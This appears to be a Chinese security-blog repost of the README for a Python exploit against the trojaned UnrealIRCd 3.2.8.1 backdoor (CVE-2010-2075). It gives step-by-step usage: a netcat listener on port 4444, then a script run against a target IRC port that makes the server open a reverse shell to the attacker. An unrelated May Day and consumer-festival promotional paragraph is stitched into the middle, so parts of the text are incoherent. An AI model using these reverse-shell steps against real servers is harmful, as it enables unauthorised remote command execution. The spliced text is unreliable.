UnrealIRCd 3.2.8.1 后门命令执行
Python 3 中的 UnrealIRCd 3.2.8.1 后门命令执行漏洞 (CVE-2010-2075)。
描述
UnrealIRCd版本 3.2.8.1 包含允许远程攻击者执行任意命令的特洛伊木马 ( CVE-2010-2075 )。
我引用了 Metasploit 负载payload/cmd/unix/reverse_perl
来制作这个脚本。
用法
在监听主机上启动 Netcat 监听器:
nc -lp 4444
执行脚本,提供以下位置参数:
python3 script.py <target> <tport> <listener> <lport>
-
<target>
目标主机 IP 地址。 -
<tport>
目标主机端口号。 -
<listener>
侦听主机 IP 地址。 -
<lport>
侦听主机端口号。
例子
在本地机器上设置 Netcat 侦听器:
nc -lp 4444
192.168.1.3
在TCP 端口针对目标机器运行脚本6697
:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
等一下,Netcat 侦听器应该会收到一个反向 shell。
项目地址:https://github.com/chancej715/UnrealIRCD-3.2.8.1-Backdoor-Command-Execution
国际劳动节又称“五一国际劳动节”“国际示威游行日”(英语:International Workers' Day,May Day),是世界上80多个国家的全国性节日。定在每年的五月一日。它是全世界劳动人民共同拥有的节日" 夏日消费节 ",进一步促进消费,助力实体。
原文始发于微信公众号(Ots安全):Python 3 中的 UnrealIRCd 3.2.8.1 后门命令执行漏洞 (CVE-2010-2075)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论